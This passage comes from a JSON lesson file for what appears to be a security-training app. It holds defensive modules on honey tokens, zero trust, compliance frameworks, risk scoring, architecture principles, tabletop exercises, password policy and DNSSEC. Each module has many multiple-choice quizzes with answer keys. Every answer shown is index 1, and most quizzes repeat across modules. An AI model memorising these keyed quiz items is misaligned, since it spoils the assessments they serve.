passwords"],"ans":1}]},{"id":"df-deception2","cat":"Defense & Blue Team","title":"Deception Technology","diff":3,"xp":200,"intro":"Fake assets that detect attacker activity.","sections":[{"type":"text","content":"Fake assets that detect attacker activity."},{"type":"code","lang":"bash","content":"# Honey tokens: fake creds in shares, LSASS, browsers\n# Honey files: canary documents that alert on open\n# Honey DNS: fake internal records\n# Honey services: fake SSH, SMB, HTTP on unused IPs\n# canarytokens.org for quick deployment"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Any interaction with a honey token means...","opts":["Normal activity","An attacker is present (zero false positives by design)","A misconfiguration","Routine scanning"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-zero-trust2","cat":"Defense & Blue Team","title":"Zero Trust Implementation","diff":3,"xp":200,"intro":"Never trust, always verify \u2014 practical implementation.","sections":[{"type":"text","content":"Never trust, always verify \u2014 practical implementation."},{"type":"code","lang":"bash","content":"# ZT principles:\n# 1. Verify explicitly (authenticate every request)\n# 2. Least privilege (JIT/JEA access)\n# 3. Assume breach (segment, encrypt, monitor)\n# Implementation: identity-based access, micro-segmentation, continuous validation"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Zero trust means...","opts":["Trust the internal network","Never trust any request without verification","Block all traffic","Disable VPN"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-compliance","cat":"Defense & Blue Team","title":"Security Compliance Frameworks","diff":1,"xp":75,"intro":"NIST, CIS, ISO 27001, SOC 2, PCI-DSS overview.","sections":[{"type":"text","content":"NIST, CIS, ISO 27001, SOC 2, PCI-DSS overview."},{"type":"code","lang":"bash","content":"# NIST CSF: Identify, Protect, Detect, Respond, Recover\n# CIS Controls: prioritized security actions\n# ISO 27001: ISMS certification\n# SOC 2: trust principles for service providers\n# PCI-DSS: payment card data protection"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"NIST CSF has how many functions?","opts":["3","5 (Identify, Protect, Detect, Respond, Recover)","7","10"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-risk-assessment","cat":"Defense & Blue Team","title":"Risk Assessment Methodology","diff":2,"xp":150,"intro":"Identify, analyze, and prioritize security risks.","sections":[{"type":"text","content":"Identify, analyze, and prioritize security risks."},{"type":"code","lang":"bash","content":"# Risk = Likelihood x Impact\n# 1. Identify assets and threats\n# 2. Assess vulnerability and likelihood\n# 3. Calculate risk score\n# 4. Prioritize by score\n# 5. Apply controls to reduce risk"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Risk is calculated as...","opts":["Threats only","Likelihood x Impact","Assets only","Vulnerabilities only"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-security-architecture","cat":"Defense & Blue Team","title":"Security Architecture Principles","diff":3,"xp":200,"intro":"Design secure systems from the ground up.","sections":[{"type":"text","content":"Design secure systems from the ground up."},{"type":"code","lang":"bash","content":"# Principles:\n# Defense in depth (multiple layers)\n# Least privilege (minimum access)\n# Separation of duties\n# Fail secure (deny by default)\n# Keep it simple (complexity = bugs)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection","Full encryption"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-tabletop2","cat":"Defense & Blue Team","title":"IR Tabletop Exercises","diff":2,"xp":150,"intro":"Walk through scenarios without touching systems.","sections":[{"type":"text","content":"Walk through scenarios without touching systems."},{"type":"code","lang":"bash","content":"# Scenario: 'Ransomware encrypted 50 servers'\n# Questions: Who do you notify? What logs check first?\n# How contain? Pay or rebuild? Communication plan?\n# After-action: what went well, what didn't?"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Tabletops test...","opts":["Technical skills","Decision-making and communication under pressure","Coding ability","Network configuration"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-password-policy","cat":"Defense & Blue Team","title":"Password Policy Design","diff":1,"xp":75,"intro":"Balance security with usability.","sections":[{"type":"text","content":"Balance security with usability."},{"type":"code","lang":"bash","content":"# Modern guidance (NIST 800-63B):\n# Minimum 8 chars (prefer 12+)\n# NO forced rotation (unless compromised)\n# NO complexity rules (encourages bad patterns)\n# YES: check against breach databases\n# YES: require MFA"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"NIST 800-63B recommends...","opts":["90-day rotation","No forced rotation (change only on compromise)","Complex requirements","Short passwords"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-dns-security","cat":"Defense & Blue Team","title":"DNS Security (DNSSEC, DoH, DoT)","diff":2,"xp":150,"intro":"Secure DNS resolution.","sections":[{"type":"text","content":"Secure DNS resolution."},{"type":"code","lang":"bash","content":"# DNSSEC: cryptographic signatures on DNS records\n# DoH: DNS over HTTPS (encrypted)\n# DoT: DNS over TLS (encrypted)\ndig +dnssec example.com\n# Check DNSSEC validation\ndig +cd +dnssec example.com"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"DNSSEC provides...","opts":["Encryption","Authentication of DNS responses (prevents spoofing)","Privacy","Speed"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident 